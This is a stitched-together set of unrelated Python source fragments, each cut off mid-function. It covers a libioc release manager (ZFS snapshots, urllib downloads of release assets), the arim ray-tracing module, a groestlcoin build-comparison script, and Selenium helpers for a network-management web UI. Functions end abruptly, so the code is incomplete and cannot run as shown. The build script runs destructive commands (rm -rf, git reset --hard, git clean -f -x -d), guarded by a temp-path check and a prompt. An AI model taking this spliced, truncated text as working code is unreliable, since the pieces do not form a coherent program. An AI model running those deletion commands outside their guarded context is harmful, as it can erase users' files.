identifier: str,
force: bool=False
) -> libzfs.ZFSSnapshot:
"""
Create a ZFS snapshot of the release.
Args:
identifier:
This string specifies the snapshots name
force: (default=False)
Enabling this option forces re-creation of a snapshot in case
it already exists for the given identifier
Returns:
libzfs.ZFSSnapshot: The ZFS snapshot object found or created
"""
snapshot_name = f"{self.root_dataset.name}@{identifier}"
existing_snapshot: typing.Optional[libzfs.ZFSSnapshot] = None
try:
existing_snapshot = self.zfs.get_snapshot(snapshot_name)
if (force is False) and (existing_snapshot is not None):
self.logger.verbose(
f"Re-using release snapshot {self.name}@{identifier}"
)
return existing_snapshot
except libzfs.ZFSException:
existing_snapshot = None
if existing_snapshot is not None:
self.logger.verbose(
f"Deleting release snapshot {self.name}@{identifier}"
)
existing_snapshot.delete()
existing_snapshot = None
self.root_dataset.snapshot(snapshot_name)
snapshot: libzfs.ZFSSnapshot = self.zfs.get_snapshot(snapshot_name)
return snapshot
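    # Illustrative use of snapshot(): fetch() above records the freshly
    # extracted release as "p0"; applied patch levels can be recorded as
    # "p1", "p2", ... so that version_snapshots() can list them.
    #
    #   snap = release.snapshot("p1")              # re-used if it exists
    #   snap = release.snapshot("p1", force=True)  # deleted and re-created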
def _ensure_dataset_mounted(self) -> None:
if not self.dataset.mountpoint:
self.dataset.mount()
def _fetch_hashes(self) -> None:
url = f"{self.remote_url}/{self.host.distribution.hash_file}"
path = self.__get_hashfile_location()
self.logger.verbose(f"Downloading hashes from {url}")
urllib.request.urlretrieve(url, path) # nosec: validated in @setter
self.logger.debug(f"Hashes downloaded to {path}")
def _fetch_assets(
self,
event_scope: typing.Optional['libioc.events.Scope']=None,
) -> typing.Generator['libioc.events.IocEvent', None, None]:
for asset in self.assets:
releaseAssetDownloadEvent = libioc.events.ReleaseAssetDownload(
release=self,
scope=event_scope
)
yield releaseAssetDownloadEvent.begin()
url = f"{self.remote_url}/{asset}.txz"
path = self._get_asset_location(asset)
if os.path.isfile(path):
                yield releaseAssetDownloadEvent.skip(f"{path} already exists")
else:
try:
self.logger.debug(f"Starting download of {url}")
urllib.request.urlretrieve(url, path) # nosec: validated
self.logger.verbose(f"{url} was saved to {path}")
yield releaseAssetDownloadEvent.end()
except urllib.error.HTTPError as http_error:
yield releaseAssetDownloadEvent.fail()
raise libioc.errors.DownloadFailed(
url=url,
code=http_error.code,
logger=self.logger
)
def read_hashes(self) -> typing.Dict[str, str]:
"""Read the release asset hashes."""
# yes, this can read HardenedBSD and FreeBSD hash files
path = self.__get_hashfile_location()
hashes = {}
with open(path, "r", encoding="utf-8") as f:
for line in f.read().splitlines():
s = set(line.replace("\t", " ").split(" "))
fingerprint = None
asset = None
for x in s:
x = x.strip("()")
if len(x) == 64:
fingerprint = x
elif x.endswith(".txz"):
asset = x[:-4]
if asset and fingerprint:
hashes[asset] = fingerprint
count = len(hashes)
self.logger.spam(f"{count} hashes read from {path}")
return hashes
def __get_hashfile_location(self) -> str:
hash_file = self.host.distribution.hash_file
return f"{self.download_directory}/{hash_file}"
def _get_asset_location(self, asset_name: str) -> str:
return f"{self.download_directory}/{asset_name}.txz"
def _extract_assets(self) -> None:
for asset in self.assets:
if self.check_hashes:
self._check_asset_hash(asset)
libioc.SecureTarfile.extract(
file=self._get_asset_location(asset),
compression_format="xz",
destination=self.root_dir,
logger=self.logger
)
def _set_default_rc_conf(self) -> bool:
for key, value in self.DEFAULT_RC_CONF.items():
self.rc_conf[key] = value
return self.rc_conf.save() is True
    def _set_default_sysctl_conf(self) ->
<filename>arim/ray.py
"""
Ray tracing module
"""
import contextlib
import gc
import logging
import math
import time
import warnings
from concurrent.futures import ThreadPoolExecutor
import numba
import numpy as np
from . import settings as s
from . import geometry as g
from .helpers import Cache, NoCache
from .exceptions import InvalidDimension, ArimWarning
from .helpers import chunk_array
def find_minimum_times(
time_1, time_2, dtype=None, dtype_indices=None, block_size=None, numthreads=None
):
"""
For i=1:n and j=1:p,
out_min_times(i, j) := min_{k=1:m} time_1[i, k] + time_2[k, j]
out_min_indices(i, j) := argmin_{k=1:m} time_1[i, k] + time_2[k, j]
Parameters
----------
time_1
Shape: (n, m)
time_2
Shape: (m, p)
dtype
dtype_indices
Returns
-------
out_min_times
Shape: (n, p)
out_min_indices
Shape: (n, p)
Notes
-----
Memory usage:
    - duplicate 'time_1' if it is not in C-order.
    - duplicate 'time_2' if it is not in Fortran-order.
"""
assert time_1.ndim == 2
assert time_2.ndim == 2
try:
n, m = time_1.shape
m_, p = time_2.shape
except ValueError:
raise InvalidDimension("time_1 and time_2 must be 2d.")
if m != m_:
raise ValueError("Array shapes must be (n, m) and (m, p).")
if dtype is None:
dtype = np.result_type(time_1, time_2)
if dtype_indices is None:
dtype_indices = s.INT
if block_size is None:
block_size = s.BLOCK_SIZE_FIND_MIN_TIMES
if numthreads is None:
numthreads = s.NUMTHREADS
out_min_times = np.full((n, p), np.inf, dtype=dtype)
out_best_indices = np.full((n, p), np.inf, dtype=dtype_indices)
# time_1 will be scanned row per row, time_2 column per column.
# Force to use the most efficient order (~20 times speed-up between the best and worst case).
time_1 = np.ascontiguousarray(time_1)
time_2 = np.asfortranarray(time_2)
# Chunk time_1 and time_2 such as each chunk contains roughly 'block_size'
# floats. Chunks for 'time_1' are lines (only complete lines), chunks
# for 'time_2' are columns (only complete columns).
block_size_adj = math.ceil(block_size / m)
futures = []
with ThreadPoolExecutor(max_workers=numthreads) as executor:
for chunk1 in chunk_array((n, m), block_size_adj, axis=0):
for chunk2 in chunk_array((m, p), block_size_adj, axis=1):
chunk_res = (chunk1[0], chunk2[1])
futures.append(
executor.submit(
_find_minimum_times,
time_1[chunk1],
time_2[chunk2],
out_min_times[chunk_res],
out_best_indices[chunk_res],
)
)
# Raise exceptions that happened, if any:
for future in futures:
future.result()
return out_min_times, out_best_indices
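# Small illustrative example of find_minimum_times() (not part of arim's API
# or test-suite), composing two travel-time tables over a common interface:
#
#   import numpy as np
#   time_1 = np.array([[1.0, 5.0],      # (n=2, m=2): sources -> interface
#                      [2.0, 1.0]])
#   time_2 = np.array([[4.0],           # (m=2, p=1): interface -> receiver
#                      [1.0]])
#   times, best_k = find_minimum_times(time_1, time_2)
#   # times  == [[5.0], [2.0]]   min over k of time_1[i, k] + time_2[k, j]
#   # best_k == [[0],   [1]]     index k achieving the minimum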
@numba.jit(nopython=True, nogil=True, cache=True)
def _find_minimum_times(time_1, time_2, out_min_times, out_best_indices):
"""
Parameters
----------
time_1
time_2
    out_min_times
out_best_indices
Returns
-------
"""
n, m = time_1.shape
m, p = time_2.shape
for i in range(n):
for j in range(p):
for k in range(m):
new_time = time_1[i, k] + time_2[k, j]
if new_time < out_min_times[i, j]:
out_min_times[i, j] = new_time
out_best_indices[i, j] = k
logger = logging.getLogger(__name__)
def ray_tracing_for_paths(paths_list, convert_to_fortran_order=False):
"""
Perform the ray tracing for different paths. Save the result in ``Path.rays``.
Parameters
----------
paths_list : List[Path]
convert_to_fortran_order
Returns
-------
None
"""
paths_list = tuple(paths_list)
fermat_paths_tuple = tuple(FermatPath.from_path(path) for path in paths_list)
fermat_solver = FermatSolver(fermat_paths_tuple)
rays_dict = fermat_solver.solve()
for path, fermat_path in zip(paths_list, fermat_paths_tuple):
rays = rays_dict[fermat_path]
suspicious_rays = rays.gone_through_extreme_points()
num_suspicious_rays = suspicious_rays.sum()
if num_suspicious_rays > 0:
logger.warning(
f"{num_suspicious_rays} rays of path {path.name} go through "
"the interface limits. Extend limits."
)
if convert_to_fortran_order:
old_rays_dict = rays_dict
rays_dict = {k: v.to_fortran_order() for k, v in old_rays_dict.items()}
# Save results in attribute path.rays:
for path, fermat_path in zip(paths_list, fermat_paths_tuple):
path.rays = rays_dict[fermat_path]
def ray_tracing(views_list, convert_to_fortran_order=False):
"""
Perform the ray tracing for different views. Save the result in ``Path.rays``.
Parameters
----------
    views_list : List[View]
Returns
-------
None
"""
# Ray tracing:
paths_set = set(v.tx_path for v in views_list) | set(v.rx_path for v in views_list)
return ray_tracing_for_paths(
list(paths_set), convert_to_fortran_order=convert_to_fortran_order
)
@numba.jit(nopython=True, nogil=True, parallel=True)
def _expand_rays(interior_indices, indices_new_interface, expanded_indices):
"""
Expand the rays by one interface knowing the beginning of the rays and the
points the rays must go through at the last interface.
A0, A1, ..., A(d+1) are (d+2) interfaces.
n: number of points of interface A0
m: number of points of interface Ad
p: number of points of interface A(d+1)
Arrays layout must be contiguous.
Output: out_ray
Parameters
----------
interior_indices: *interior* indices of rays going from A(0) to A(d).
Shape: (d, n, m)
indices_new_interface: indices of the points of interface A(d) that the rays
starting from A(0) cross to go to A(d+1).
Shape: (n, p)
expanded_indices: OUTPUT
Shape (d+1, n, p)
"""
d, n, m = interior_indices.shape
_, p = indices_new_interface.shape
for i in numba.prange(n):
for j in range(p):
# get the point on interface A(d) to which the ray goes
idx = indices_new_interface[i, j]
# copy the head of ray
for k in range(d):
expanded_indices[k, i, j] = interior_indices[k, i, idx]
# add the last point
expanded_indices[d, i, j] = idx
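# Illustrative reading of _expand_rays() (a summary of the docstring above,
# not an additional API): if interior_indices[:, i, k] describes the head of
# the best ray from A(0)[i] to A(d)[k], and indices_new_interface[i, j] = k
# says that the best ray from A(0)[i] to A(d+1)[j] crosses A(d) at point k,
# then expanded_indices[:, i, j] is that head copied over with k appended as
# the new last entry.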
class Rays:
"""
Rays(times, interior_indices, path)
Store the rays between the first and last sets of points along
a specific path.
- n: number of points of the first set of points.
- m: number of points of the last set of points.
- d: number of interfaces along the path.
We name A(1), A(2), ..., A(d) the d interfaces along the path.
A ray passes A(1), A(2), ..., A(d) in this order.
    The ray (i, j) is defined as the ray starting in ``A(1)[i]`` and
    arriving in ``A(d)[j]``.
Parameters
----------
times : ndarray of floats [n x m]
Shortest time between first and last set of points.
``times[i, j]`` is the total travel time for the ray (i, j).
    interior_indices : ndarray of ints [(d-2) x n x m]
        Indices of points through which each ray goes, excluding the first and last interfaces.
        ``interior_indices[k-1, i, j]`` is the index of the point on the k-th *interior* interface
        through which the ray (i, j) goes.
fermat_path : FermatPath
Sets of points crossed by the rays.
order : None, 'C' or 'F'
        Force the memory order of the indices array.
Attributes
----------
times
    interior_indices
fermat_path
    indices : ndarray of ints [d x n x m]
        Indices of points through which each ray goes.
        For k=0:(d-1), a ray starting from ``A(1)[i]`` and ending in ``A(d)[j]``
        goes through the k-th interface at the point indexed by ``indices[k, i, j]``.
By definition, ``indices[0, i, j] := i`` and ``indices[d-1, i, j] := j``
for all i and j.
"""
# __slots__ = []
def __init__(self, times, interior_indices, fermat_path, order=None):
assert times.ndim == 2
assert interior_indices.ndim == 3
assert (
times.shape
== interior_indices.shape[1:]
== (len(fermat_path.points[0]), len(fermat_path.points[-1]))
)
assert fermat_path.num_points_sets == interior_indices.shape[0] + 2
assert interior_indices.dtype.kind == "i"
assert times.dtype.kind == "f"
indices = self.make_indices(interior_indices, order=order)
self._times = times
self._indices = indices
self._fermat_path = fermat_path
@classmethod
def make_rays_two_interfaces(cls, times, path, dtype_indices):
"""
        Alternative constructor for Rays objects when there are only two interfaces,
i.e. no interior interface.
"""
if path.num_points_sets != 2:
raise ValueError(
"This constructor works only for path with two interfaces. Use __init__ instead."
)
n = len(path.points[0])
m = len(path.points[1])
interior_indices = np.zeros((0, n, m), dtype=dtype_indices)
return cls(times, interior_indices, path)
@property
def fermat_path(self):
return self._fermat_path
@property
def times(self):
return self._times
@property
def indices(self):
return self._indices
@property
def interior_indices(self):
return self.indices[1:-1, ...]
@staticmethod
def make_indices(interior_indices, order=None):
"""
Parameters
----------
interior_indices : ndarray
Shape (d, n, m)
Returns
-------
indices : ndarray
            Shape (d+2, n, m) such that:
                - indices[0, i, j] := i for all i, j
                - indices[-1, i, j] := j for all i, j
                - indices[k, i, j] := interior_indices[k-1, i, j] for all i, j and for k=1:d
"""
dm2, n, m = interior_indices.shape
if order is None:
if interior_indices.flags.c_contiguous:
order = "C"
elif interior_indices.flags.fortran:
order = "F"
else:
order = "C"
indices = np.zeros((dm2 + 2, n, m), dtype=interior_indices.dtype, order=order)
indices[0, ...] = np.repeat(np.arange(n), m).reshape((n, m))
indices[-1, ...] = np.tile(np.arange(m), n).reshape((n, m))
indices[1:-1, ...] = interior_indices
return indices
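    # Small illustrative example of make_indices() (consistent with the layout
    # described in the class docstring): with one interior interface, n=2 and
    # m=2,
    #
    #   interior_indices = np.array([[[7, 8],
    #                                 [9, 5]]])          # shape (1, 2, 2)
    #   indices = Rays.make_indices(interior_indices)    # shape (3, 2, 2)
    #   # indices[0] == [[0, 0], [1, 1]]   (start index i)
    #   # indices[1] == interior_indices[0]
    #   # indices[2] == [[0, 1], [0, 1]]   (end index j)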
def get_coordinates(self, n_interface):
"""
Yields the coordinates of the rays of the n-th interface, as a tuple
of three 2d ndarrays.
Use numpy fancy indexing.
Example
-------
::
            for d in range(rays.fermat_path.num_points_sets):
                x, y, z = next(rays.get_coordinates(d))
                # Coordinates at the d-th interface of the ray between A(1)[i]
                # and A(d)[j]:
x[i, j]
y[i, j]
z[i, j]
"""
points = self.fermat_path.points[n_interface]
indices = self.indices[n_interface, ...]
x = points.x[indices]
y = points.y[indices]
z = points.z[indices]
yield (x, y, z)
def get_coordinates_one(self, start_index, end_index):
"""
Return the coordinates of one ray as ``Point``.
        This function is slow: use ``get_coordinates`` or a variant
<filename>build-for-compare.py
#!/usr/bin/env python3
# Written by <NAME>, provided under MIT license.
#
# Usage: ../do_build.py <hash> [<hash> ...]
# Will produce a ../groestlcoind.$1.stripped for binary comparison
import os,subprocess,sys,argparse,logging,shutil,re,hashlib,shlex,tempfile
from collections import defaultdict
from typing import Iterator, List
logger = logging.getLogger('do_build')
# Use this command to compare resulting directories
# git diff -W --word-diff /tmp/compare/4b5b263 /tmp/compare/d1bc5bf
# WARNING WARNING WARNING
# DO NOT RUN this with --nocopy=1 on working tree if you have any local additions.
# It will nuke all non-repository files, multiple times over.
# WARNING WARNING WARNING
CONFIGURE_EXTRA=[
'EVENT_CFLAGS=-I/opt/libevent/include',
'EVENT_LIBS=-L/opt/libevent/lib -levent',
'EVENT_PTHREADS_CFLAGS=-I/opt/libevent/include',
'EVENT_PTHREADS_LIBS=-L/opt/libevent/lib -levent_pthreads'
]
DEFAULT_PARALLELISM=4
DEFAULT_ASSERTIONS=0
DEFAULT_NOCOPY=0
DEFAULT_PATCH='stripbuildinfo.patch'
TMPDIR=tempfile.gettempdir()
DEFAULT_TGTDIR=os.path.join(TMPDIR, 'compare')
DEFAULT_REPODIR=os.path.join(TMPDIR, 'repo')
# No debugging information (not used by analysis at the moment, saves on I/O)
OPTFLAGS=["-O0","-g0"]
# Some options from -O to reduce code size
# can't use -O or -Os as it does some weird cross-contamination between unchanged functions in compilation unit
# Selectively enable opts that don't interfere or cause excessive sensitivity to changes
#
OPTFLAGS+=["-fcombine-stack-adjustments","-fcompare-elim","-fcprop-registers","-fdefer-pop","-fforward-propagate","-fif-conversion","-fif-conversion2",
"-finline-functions-called-once","-fshrink-wrap","-fsplit-wide-types","-ftree-bit-ccp","-ftree-ccp","-ftree-ch","-ftree-copy-prop","-ftree-copyrename",
"-ftree-dce","-ftree-dominator-opts","-ftree-dse","-ftree-fre","-ftree-sink","-ftree-slsr","-ftree-sra","-ftree-ter"
]
#
# -ffunctions-sections/-fdata-sections put every element in its own section. This is essential.
OPTFLAGS+=['-ffunction-sections', '-fdata-sections']
# Fix the random seed
OPTFLAGS+=['-frandom-seed=notsorandom']
# OFF: -fmerge-constants don't attempt to merge constants: this causes global interaction between sections/functions
# this was reenabled because it doesn't matter, the numbered section names are annoying merged or unmerged
OPTFLAGS+=['-fmerge-all-constants']
# -fipa-sra semi-randomly renames functions (or creates variants of functions with different names)
OPTFLAGS+=['-fno-ipa-sra']
# -freorder-functions moves functions to .unlikely .hot sections
OPTFLAGS+=['-fno-reorder-functions']
# no interprocedural optimizations
# -fno-ipa-profile -fno-ipa-pure-const -fno-ipa-reference -fno-guess-branch-probability -fno-ipa-cp
CPPFLAGS=[]
# Prevent __LINE__ from messing with things
#CPPFLAGS+=["-D__LINE__=0","-D__DATE__=\"\""] #-D__COUNTER__=0"
# XXX unfortunately this approach does not work thanks to boost.
# objcopy: strip all symbols, debug info, and the hash header section
OBJCOPY_ARGS=['-R.note.gnu.build-id','-g','-S']
OBJDUMP_ARGS=['-C','--no-show-raw-insn','-d','-r']
# Set QT_RCC_SOURCE_DATE_OVERRIDE so that groestlcoin-qt is deterministic
os.environ['QT_RCC_SOURCE_DATE_OVERRIDE'] = '1'
# These can be overridden from the environment
GIT=os.getenv('GIT', 'git')
MAKE=os.getenv('MAKE', 'make')
RSYNC=os.getenv('RSYNC', 'rsync')
OBJCOPY=os.getenv('OBJCOPY', 'objcopy')
OBJDUMP=os.getenv('OBJDUMP', 'objdump')
OBJEXT=os.getenv('OBJEXT', '.o') # object file extension
PYDIR=os.path.dirname(os.path.abspath(__file__))
PATCHDIR=os.path.join(PYDIR,'patches')
def init_logging():
LOG_PREFMT = {
(logging.DEBUG, '\x1b[38;5;239m[%(name)-8s]\x1b[0m %(message)s\x1b[0m'),
(logging.INFO, '\x1b[38;5;19m>\x1b[38;5;18m>\x1b[38;5;17m> \x1b[38;5;239m[%(name)-8s]\x1b[0m %(message)s\x1b[0m'),
(logging.WARNING, '\x1b[38;5;228m>\x1b[38;5;227m>\x1b[38;5;226m> \x1b[38;5;239m[%(name)-8s]\x1b[38;5;226m %(message)s\x1b[0m'),
(logging.ERROR, '\x1b[38;5;208m>\x1b[38;5;202m>\x1b[38;5;196m> \x1b[38;5;239m[%(name)-8s]\x1b[38;5;196m %(message)s\x1b[0m'),
(logging.CRITICAL, '\x1b[48;5;196;38;5;16m>>> [%(name)-8s] %(message)s\x1b[0m'),
}
class MyStreamHandler(logging.StreamHandler):
def __init__(self, stream, formatters):
logging.StreamHandler.__init__(self, stream)
self.formatters = formatters
def format(self, record):
return self.formatters[record.levelno].format(record)
formatters = {}
for (level, fmtstr) in LOG_PREFMT:
formatters[level] = logging.Formatter(fmtstr)
handler = MyStreamHandler(sys.stdout, formatters)
logging.basicConfig(level=logging.DEBUG, handlers=[handler])
def safe_path(path: str) -> bool:
'''
Ensure dir is a path we can nuke without consequences.
This is currently restricted to /tmp/<anything>.
'''
abspath = os.path.abspath(path)
if abspath[0] != '/': return False # ???
comps = abspath[1:].split('/') # skip leading slash to avoid relying on empty first component
return len(comps) > 1 and abspath.startswith(TMPDIR)
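# Illustrative behaviour of safe_path(), assuming TMPDIR is '/tmp':
#   safe_path('/tmp/compare')   -> True   (inside the temp dir, nested one level)
#   safe_path('/tmp')           -> False  (the temp dir itself)
#   safe_path('/home/user/src') -> False  (outside the temp dir)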
def shell_split(s: str) -> List[str]:
return shlex.split(s)
def shell_join(s) -> str:
return ' '.join(shlex.quote(x) for x in s)
def check_call(args) -> int:
'''Wrapper for subprocess.check_call that logs what command failed'''
try:
subprocess.check_call(args)
except Exception:
logger.error('Command failed: {}'.format(shell_join(args)))
raise
def cmd_exists(cmd) -> bool:
'''Determine if a given command is available. Requires "which".'''
try:
with open(os.devnull, 'w') as FNULL:
subprocess.check_call(['which', cmd], stdout=FNULL)
except:
return False
return True
def iterate_objs(srcdir: str) -> Iterator[str]:
'''Iterate over all object files in srcdir'''
for (root, dirs, files) in os.walk(srcdir):
if not root.startswith(srcdir):
raise ValueError
root = root[len(srcdir)+1:]
for filename in files:
if filename.endswith(OBJEXT):
yield os.path.join(root, filename)
def copy_o_files(srcdir: str, tgtdir: str):
'''Copy all object files from srcdir to dstdir, keeping the same directory hierarchy'''
for objname in iterate_objs(srcdir):
outname = os.path.join(tgtdir, objname)
os.makedirs(os.path.dirname(outname), exist_ok=True)
shutil.copy(os.path.join(srcdir, objname), outname)
def objdump_all(srcdir: str, tgtdir: str):
'''
Object analysis pass using objdump.
'''
for objname in iterate_objs(srcdir):
objname = os.path.join(srcdir, objname)
p = subprocess.Popen([OBJDUMP] + OBJDUMP_ARGS + [objname], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(out,err) = p.communicate()
if p.returncode != 0:
raise Exception('objdump failed')
(out,err) = (out.decode(),err.decode())
# postprocess- break into sections separated by 'Disassembly of section...'
sections = defaultdict(list)
funcname = ''
for line in out.splitlines():
match = re.match('^Disassembly of section (.*):$', line)
if match:
funcname = match.group(1)
if not '.rodata' in line: # filter out 'ebc: R_X86_64_32 .rodata+0x1944'
sections[funcname].append(line)
'''
lines = []
for section in sorted(sections.keys()): # '' header section automatically comes first
#lines.extend(sections[section])
lines.append(sections[section][0])
out = '\n'.join(lines)
outname = os.path.join(tgtdir, objname[:-len(OBJEXT)] + '.dis')
make_parent_dirs(outname)
with open(outname, 'w') as f:
f.write(out)
'''
for section in sections.keys():
if not section:
continue
name = hashlib.sha1(section.encode()).hexdigest()
outname = os.path.join(tgtdir, name + '.dis')
os.makedirs(os.path.dirname(outname), exist_ok=True)
with open(outname, 'w') as f:
f.write('\n'.join(sections[section]))
# some TODO s, learning about the objdump output:
# - demangle section names
# - remove/make relative addresses
# - sort/combine sections
# - remove duplicate sections? (sounds like linker's work - can we do a partial link that preserves sections, such as for inlines?)
# - resolve callq's relocations - these are ugly right now - integrate reloc result into instruction by substituting argument
# - [- 17: R_X86_64_32S vtable for boost::exception_detail::bad_exception_+0x30-]
# (at the very least delete callq's arguments)
# - for data (mov etc): fill in data? pointers change arbitrarily especially in combined string tables (.rodata.str1...)
# and these entries don't have names/symbols
# - or could use a different disassembler completely, such as capstone. Parsing objdump output is a hack.
def parse_arguments():
parser = argparse.ArgumentParser(description='Build to compare binaries. Execute this from a repository directory.')
parser.add_argument('commitids', metavar='COMMITID', nargs='+')
parser.add_argument('--executables', default='src/groestlcoind', help='Comma-separated list of executables to build, default is "src/groestlcoind"')
parser.add_argument('--tgtdir', default=DEFAULT_TGTDIR, help='Target directory, default is "{}"'.format(DEFAULT_TGTDIR))
parser.add_argument('--repodir', default=DEFAULT_REPODIR, help='Temp repository directory, default is "{}"'.format(DEFAULT_REPODIR))
parser.add_argument('--parallelism', '-j', default=DEFAULT_PARALLELISM, type=int, help='Make parallelism, default is {}'.format(DEFAULT_PARALLELISM))
parser.add_argument('--assertions', default=DEFAULT_ASSERTIONS, type=int, help='Build with assertions, default is {}'.format(DEFAULT_ASSERTIONS))
parser.add_argument('--opt', default=None, type=str, help='Override C/C++ optimization flags. Prepend + to avoid collisions with arguments, e.g. "+-O2 -g"')
parser.add_argument('--patches', '-P', default=None, type=str, help='Comma separated list of stripbuildinfo patches to apply, one per hash (in order).')
parser.add_argument('--prefix', default=None, type=str, help='A depends prefix that will be passed to configure')
parser.add_argument('--nocopy', default=DEFAULT_NOCOPY, type=int, help='Build directly in the repository. If unset, will rsync or copy the repository to a temporary directory first, default is {}'.format(DEFAULT_NOCOPY))
args = parser.parse_args()
args.patches = dict(zip(args.commitids, [v.strip() for v in args.patches.split(',')])) if args.patches is not None else {}
args.executables = args.executables.split(',')
if args.opt is not None:
if not args.opt.startswith('+'):
print('"opt" argument must start with +', file=sys.stderr)
exit(1)
args.opt = shell_split(args.opt[1:])
else:
args.opt = OPTFLAGS
# Safety checks
if not args.nocopy and not safe_path(args.repodir):
logger.error('Temp repository directory {} may not be used. Please use {}, e.g. "{}/{}"'.format(args.repodir, TMPDIR, TMPDIR, args.repodir))
exit(1)
return args
def main():
args = parse_arguments()
init_logging()
try:
try:
os.makedirs(args.tgtdir)
except FileExistsError:
logger.warning("{} already exists, remove it if you don't want to continue a current comparison session".format(args.tgtdir))
if safe_path(args.tgtdir):
dodelete = input("Delete {}? [y/n] ".format(args.tgtdir))
if dodelete == 'y' or dodelete == 'Y':
# Remove target dir
logger.info('Removing {}'.format(args.tgtdir))
check_call(['rm', '-rf', args.tgtdir])
for commit in args.commitids:
try:
int(commit,16)
except ValueError:
logger.error('{} is not a hexadecimal commit id. It\'s the only thing we know.'.format(commit))
exit(1)
# Copy repo, unless nocopy is set
if not args.nocopy and safe_path(args.repodir):
if cmd_exists(RSYNC.split(' ')[0]):
logger.info('RSyncing repository ...')
check_call([RSYNC,
'-r', # recursive
'--delete', # delete extraneous files on dst
'.git', # from .git in CWD
args.repodir]) # to repodir
else:
gitdir = os.path.join(args.repodir, '.git')
logger.warning('Command "rsync" not found; resorting to cp, which tends to be slower.')
logger.info('Copying repository ...')
# Touch (to avoid file not found) and remove repodir/.git so we don't end up with repodir/.git/.git
check_call(['mkdir','-p',args.repodir])
check_call(['touch',gitdir])
check_call(['rm','-rf',gitdir])
check_call(['cp','-r','.git',args.repodir])
# Go to repo
os.chdir(args.repodir)
# Determine (g)make arguments
make_args = []
if args.parallelism is not None:
make_args += ['-j{}'.format(args.parallelism)]
# Disable assertions if requested
cppflags = CPPFLAGS
if not args.assertions:
cppflags+=['-DNDEBUG']
for commit in args.commitids:
logger.info("Building {}...".format(commit))
stripbuildinfopatch = args.patches[commit] if commit in args.patches else DEFAULT_PATCH
commitdir = os.path.join(args.tgtdir, commit)
commitdir_obj = os.path.join(args.tgtdir, commit+'.o')
try:
os.makedirs(commitdir)
except FileExistsError:
logger.error("{} already exists; skipping".format(commitdir))
continue
check_call([GIT,'reset','--hard'])
check_call([GIT,'clean','-f','-x','-d'])
check_call([GIT,'checkout',commit])
try:
if commit in args.patches:
logger.info('User-defined patch: {}'.format(stripbuildinfopatch))
check_call([GIT,'apply', os.path.join(PATCHDIR,stripbuildinfopatch)])
except subprocess.CalledProcessError:
logger.error('Could not apply patch to strip build info. Probably it needs to be updated')
exit(1)
check_call(['./autogen.sh'])
logger.info('Running configure script')
opt = shell_join(args.opt)
check_call(['./configure', '--disable-hardening', '--without-cli', '--disable-tests', '--disable-bench', '--disable-ccache',
'--prefix={}'.format(args.prefix) if args.prefix else '--with-incompatible-bdb',
'CPPFLAGS='+(' '.join(cppflags)),
'CFLAGS='+opt, 'CXXFLAGS='+opt, 'LDFLAGS='+opt] + CONFIGURE_EXTRA)
for name in args.executables:
logger.info('Building executable {}'.format(name))
target_name = os.path.join(args.tgtdir, os.path.basename(name) + '.' + commit)
check_call([MAKE] + make_args + [name])
shutil.copy(name, target_name)
check_call([OBJCOPY] + OBJCOPY_ARGS + [name, target_name + '.stripped'])
logger.info('Copying object files...')
copy_o_files('.', commitdir_obj)
logger.info('Performing basic analysis pass...')
objdump_all(commitdir_obj, commitdir)
if len(args.commitids)>1:
        logger.info('Use these commands to compare
changes the elements of a list from unicode to string '''
for t in range(len(my_list)):
if isinstance(my_list[t]['value'], list):
for m in range(len(my_list[t]['value'])):
my_list[t]['value'][m] = str(
my_list[t]['value'][m])
elif isinstance(my_list[t]['value'], unicode):
my_list[t]['value'] = str(
my_list[t]['value'])
else:
my_list[t]['value'] = str(
my_list[t]['value'])
# end type_change
def get_slick_cell_text(self, br=None, index=1):
try:
obj_text = self.find_element(
('slick-cell',
index),
'class',
browser=br,
elements=True).text
except WebDriverException:
time.sleep(15)
self.screenshot('not able to get slick cell')
obj_text = self.find_element(
('slick-cell',
index),
'class',
browser=br,
elements=True).text
return obj_text
# end get_slick_cell_text
def click_on_cancel_if_failure(self, element_id):
try:
element_id = 'cancelBtn'
obj = self.find_element(element_id, screenshot=False)
obj.click()
except:
pass
# end click_on_cancel_if_failure
def get_item_list(self, ui_list):
item_list = self.find_element('item-list', 'class', elements=True)
for index in range(len(item_list)):
intf_dict = {}
label = self.find_element(
'label',
'tag',
browser=item_list[index],
elements=True)
for lbl in label:
key = self.find_element('key', 'class', browser=lbl)
value = self.find_element('value', 'class', browser=lbl)
ui_list.append(value.text)
return ui_list
# end get_item_list
def expand_advance_details(self, count=20):
flag = 0
while flag < count:
plus_objs = []
try:
plus_objs = self.find_element("i[class*='icon-plus expander']",'css', elements=True,screenshot=False)
flag += 1
self.click(plus_objs)
time.sleep(3)
except (WebDriverException, TimeoutException):
break
# end expand_advance_details
def get_api_detail(self, uuid, option):
self.vn_api_url = option + uuid
return self._get_list_api(self.vn_api_url)
# end get_api_detail
def get_vn_detail_ops(self, domain, project_vn, vn_name):
self.vn_ops_url = 'virtual-network/' + domain + project_vn + ":" + \
vn_name + "?flat"
return self._get_list_ops(self.vn_ops_url)
# end get_vn_detail_ops
def click_icon_cog(self, index, browser, option, type):
self.click_element('icon-cog', 'class', index)
self.wait_till_ajax_done(index)
tool_tip_option = "//a[contains(@class,'tooltip-success')]"
tool_tip = self.find_element(tool_tip_option, 'xpath', index, elements=True)
if option == 'edit':
tool_tip[0].click()
else:
if type == 'Networks':
tool_tip[1].click()
self.click_element('configure-networkbtn1', browser=browser)
elif type =='Ports':
tool_tip[2].click()
self.click_element('configure-Portsbtn1', browser=browser)
self.wait_till_ajax_done(index)
# end click_icon_cog
def get_vn_detail_ui(self, search_key, index=0, vn_name=None):
option = 'Networks'
if not self.click_configure_networks():
self.dis_name = None
self.wait_till_ajax_done(self.browser)
if not index:
rows = self.get_rows(canvas=True)
if vn_name:
for row in rows:
out = re.search(vn_name, str(row.text))
index += 1
if out:
break
else:
index = len(rows)
toggle_icon = "//i[contains(@class,'toggleDetailIcon')]"
edit = self.find_element(toggle_icon, 'xpath', elements=True)
edit[index-1].click()
self.wait_till_ajax_done(self.browser)
item = self.find_element("//ul[contains(@class,'item-list')]", 'xpath')
out_split = re.split("\n",item.text)
join_res = "-".join(out_split)
if search_key == 'Display Name':
regexp = "Display Name\-(.*)\-UUID"
flag = True
elif search_key == 'UUID':
regexp = "UUID\-(.*)\-Admin"
flag = True
elif search_key == 'Policy':
regexp = "Policies\-(.*)\-Forwarding Mode"
flag = True
elif search_key == 'Subnet':
regexp = "Subnet(.*)Name"
flag = True
elif search_key == 'Host Route':
regexp = "Host Route\(s\)(.*)DNS"
flag = True
elif search_key == 'Adv Option':
